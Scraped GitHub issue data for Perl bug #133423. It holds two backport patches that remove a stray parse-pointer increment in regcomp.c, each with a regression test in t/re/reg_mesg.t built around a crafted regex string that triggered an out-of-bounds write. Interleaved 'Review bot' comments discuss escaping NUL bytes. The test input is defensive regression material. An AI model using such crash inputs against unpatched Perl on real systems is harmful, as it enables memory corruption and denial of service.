href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"From 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:55:55 -0600\nSubject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 3 +++\n 2 files changed, 3 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex f694ff7f8b..e1da15a77c 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15591,7 +15591,6 @@ redo_curchar:\n if (UCHARAT(RExC_parse) != ')')\n vFAIL(\u0026quot;Expecting close paren for wrapper for nested extended charclass\u0026quot;);\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git 
a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 5fb1f1a46c..2880be45eb 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -122,6 +122,8 @@ my $tab_hex = sprintf \u0026quot;%02X\u0026quot;, ord(\u0026quot;\\t\u0026quot;);\n #\n # The first set are those that should be fatal errors.\n \n+my $bug133423 = \u0026quot;(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\u0026quot;;\n+\n my @death =\n (\n '/[[=foo=]]/' =\u0026gt; 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',\n@@ -307,6 +309,7 @@ my @death =\n '/\\A{/' =\u0026gt; 'Unescaped left brace in regex is illegal here {#} m/\\A{{#}/',\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n '/\\p{vertical � tab}/' =\u0026gt; 'Can\\'t find Unicode property definition \u0026quot;vertical � tab\u0026quot; {#} m/\\\\p{vertical � tab}{#}/', # [perl #132055]\n+ \u0026quot;/$bug133423/\u0026quot; =\u0026gt; \u0026quot;Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\u0026quot;,\n \n );\n \n-- \n2.17.1\n\n\"\u003e\u003cpre class=\"notranslate\"\u003eFrom 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:55:55 -0600\nSubject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28\n\n\u003cspan class=\"pl-ms\"\u003e---\u003c/span\u003e\n regcomp.c | 1 -\n t/re/reg_mesg.t | 3 +++\n 2 files changed, 3 insertions(+), 1 deletion(-)\n\n\u003cspan class=\"pl-c1\"\u003ediff --git a/regcomp.c b/regcomp.c\u003c/span\u003e\nindex f694ff7f8b..e1da15a77c 100644\n\u003cspan class=\"pl-md\"\u003e--- 
a/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -15591,7 +15591,6 @@\u003c/span\u003e redo_curchar:\n if (UCHARAT(RExC_parse) != ')')\n vFAIL(\"Expecting close paren for wrapper for nested extended charclass\");\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e RExC_parse++;\u003c/span\u003e\n RExC_flags = save_flags;\n goto handle_operand;\n }\n\u003cspan class=\"pl-c1\"\u003ediff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\u003c/span\u003e\nindex 5fb1f1a46c..2880be45eb 100644\n\u003cspan class=\"pl-md\"\u003e--- a/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -122,6 +122,8 @@\u003c/span\u003e my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n #\n # The first set are those that should be fatal errors.\n \n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003emy $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e\u003c/span\u003e\n my @death =\n (\n '/[[=foo=]]/' =\u0026gt; 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',\n\u003cspan class=\"pl-mdr\"\u003e@@ -307,6 +309,7 @@\u003c/span\u003e my @death =\n '/\\A{/' =\u0026gt; 'Unescaped left brace in regex is illegal here {#} m/\\A{{#}/',\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... 
not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n '/\\p{vertical � tab}/' =\u0026gt; 'Can\\'t find Unicode property definition \"vertical � tab\" {#} m/\\\\p{vertical � tab}{#}/', # [perl #132055]\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e \"/$bug133423/\" =\u0026gt; \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\u003c/span\u003e\n \n );\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e- \u003c/span\u003e\n2.17.1\n\n\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"56160310e9a13224567bace30f39040f2709731d06523569ea516acdef8fbac3","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097459","createdAt":"2018-09-25T04:44:29Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":
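Review bot: The expected-message string in the added `"/$bug133423/" => ...` entry of the `@death` hunk appears to embed two raw NUL bytes (they render as U+FFFD in this copy), while `$bug133423` itself spells the same bytes as `\x00`. Writing them as escapes in the message as well, e.g. `m/(?[(?^:(?[\\\x00]))\\{#}]\x00|2[^^]...`, keeps t/re/reg_mesg.t plain text, so the regression test for this out-of-bounds write is not altered in mail or tracker transit. A trailing `# [perl #133423]` on the entry would match the ticket comments on the neighbouring entries. The `@death` list opens outside this hunk, and the 5.26 backport further down the page adds the same entry.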
{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ1OQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097461,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ2MQ==","body":"### From @tonycoz\n\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\n```diff\nFrom df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u003ckhw@cpan.org\u003e\nDate: Mon, 24 Sep 2018 11:54:41 -0600\nSubject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 4 ++++\n 2 files changed, 4 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex ca47db7573..431006e855 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15109,7 +15109,6 @@ redo_curchar:\n RExC_parse++;\n assert(UCHARAT(RExC_parse) == ')');\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 39cfcf7df1..d26a7caf37 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -106,6 +106,8 @@ my $high_mixed_digit = ('A' lt '0') ? 
'0' : 'A';\n my $colon_hex = sprintf \"%02X\", ord(\":\");\n my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n \n+my $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\n+\n ##\n ## Key-value pairs of code/error of code that should have fatal errors.\n ##\n@@ -290,6 +292,8 @@ my @death =\n '/(?xmsixp)abc/' =\u003e \"\",\n '/(?xxxx:abc)/' =\u003e \"\",\n '/(?\u003c=/' =\u003e 'Sequence (?... not terminated {#} m/(?\u003c={#}/', # [perl #128170]\n+ \"/$bug133423/\" =\u003e \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\\u0000]))\\\\{#}]\u0000|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\n+\n \n );\n \n-- \n2.17.1\n\n\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"From df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:54:41 -0600\nSubject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 4 ++++\n 2 files changed, 4 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex ca47db7573..431006e855 100644\n--- a/regcomp.c\n+++ 
b/regcomp.c\n@@ -15109,7 +15109,6 @@ redo_curchar:\n RExC_parse++;\n assert(UCHARAT(RExC_parse) == ')');\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 39cfcf7df1..d26a7caf37 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -106,6 +106,8 @@ my $high_mixed_digit = ('A' lt '0') ? '0' : 'A';\n my $colon_hex = sprintf \u0026quot;%02X\u0026quot;, ord(\u0026quot;:\u0026quot;);\n my $tab_hex = sprintf \u0026quot;%02X\u0026quot;, ord(\u0026quot;\\t\u0026quot;);\n \n+my $bug133423 = \u0026quot;(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\u0026quot;;\n+\n ##\n ## Key-value pairs of code/error of code that should have fatal errors.\n ##\n@@ -290,6 +292,8 @@ my @death =\n '/(?xmsixp)abc/' =\u0026gt; \u0026quot;\u0026quot;,\n '/(?xxxx:abc)/' =\u0026gt; \u0026quot;\u0026quot;,\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... 
not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n+ \u0026quot;/$bug133423/\u0026quot; =\u0026gt; \u0026quot;Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\u0026quot;,\n+\n \n );\n \n-- \n2.17.1\n\n\"\u003e\u003cpre class=\"notranslate\"\u003eFrom df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:54:41 -0600\nSubject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint\n\n\u003cspan class=\"pl-ms\"\u003e---\u003c/span\u003e\n regcomp.c | 1 -\n t/re/reg_mesg.t | 4 ++++\n 2 files changed, 4 insertions(+), 1 deletion(-)\n\n\u003cspan class=\"pl-c1\"\u003ediff --git a/regcomp.c b/regcomp.c\u003c/span\u003e\nindex ca47db7573..431006e855 100644\n\u003cspan class=\"pl-md\"\u003e--- a/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -15109,7 +15109,6 @@\u003c/span\u003e redo_curchar:\n RExC_parse++;\n assert(UCHARAT(RExC_parse) == ')');\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e RExC_parse++;\u003c/span\u003e\n RExC_flags = save_flags;\n goto handle_operand;\n }\n\u003cspan class=\"pl-c1\"\u003ediff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\u003c/span\u003e\nindex 39cfcf7df1..d26a7caf37 100644\n\u003cspan class=\"pl-md\"\u003e--- a/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -106,6 +106,8 @@\u003c/span\u003e my $high_mixed_digit = ('A' lt '0') ? 
'0' : 'A';\n my $colon_hex = sprintf \"%02X\", ord(\":\");\n my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n \n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003emy $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e\u003c/span\u003e\n ##\n ## Key-value pairs of code/error of code that should have fatal errors.\n ##\n\u003cspan class=\"pl-mdr\"\u003e@@ -290,6 +292,8 @@\u003c/span\u003e my @death =\n '/(?xmsixp)abc/' =\u0026gt; \"\",\n '/(?xxxx:abc)/' =\u0026gt; \"\",\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e \"/$bug133423/\" =\u0026gt; \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e\u003c/span\u003e\n \n );\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e- 
\u003c/span\u003e\n2.17.1\n\n\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"c2032a46324af389d290a694a585e569732560b67d1ec143c2ba45588ff8bf02","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097461","createdAt":"2018-09-25T04:44:29Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ2MQ=="}]},"backTimelineItems":{"pageInfo":{"hasPreviousPage":true,"startCursor":null},"totalCount":33,"edges":[]}},"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw"},"safeViewer":
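Review bot: In the regcomp.c hunk at `redo_curchar`, nothing records why the parse pointer now stays on the ')' once `RExC_parse++;` is removed. The only check on that position is `assert(UCHARAT(RExC_parse) == ')');`, which does nothing in builds where assertions are compiled out. A comment above `RExC_flags = save_flags;` would keep the increment from being reintroduced, for example `/* RExC_parse is deliberately left on the ')' here; see [perl #133423] */`. That the code reached through `goto handle_operand` consumes the ')' is inferred, because the label and the rest of the enclosing block lie outside the hunk.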
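Review bot: In the second t/re/reg_mesg.t hunk, the expected message for `"/$bug133423/"` appears to carry raw NUL bytes, while the `$bug133423` definition in the first hunk spells the same bytes as `\x00`. The raw bytes are visible only as rendered on this page, where the highlighted copy shows them as U+FFFD, so they may be an artefact of how the patch was transported. If the file really contains them, escapes inside the double-quoted string would survive editors and mail transport better and give the same value, as in `(?[\\\x00]))\\{#}]\x00|2`. The rest of the `@death` list lies outside the hunk.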
linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jmMBqY{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:50%;height:16px;}/*!sc*/ .jmMBqY::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .izxDlu{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:52%;height:16px;}/*!sc*/ .izxDlu::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ 
.kxHHCJ{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:40%;height:16px;}/*!sc*/ .kxHHCJ::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .kzTRZv{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:42%;height:16px;}/*!sc*/ .kzTRZv::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .cGKgXT{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:71%;height:16px;}/*!sc*/ .cGKgXT::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite 
linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jhGuqg{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:45%;height:16px;}/*!sc*/ .jhGuqg::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .iXfpGx{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:77%;height:16px;}/*!sc*/ .iXfpGx::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ 
.likIaf{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:64%;height:16px;}/*!sc*/ .likIaf::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .iFsrGy{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:78%;height:16px;}/*!sc*/ .iFsrGy::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jiLAah{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:66%;height:16px;}/*!sc*/ .jiLAah::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite 
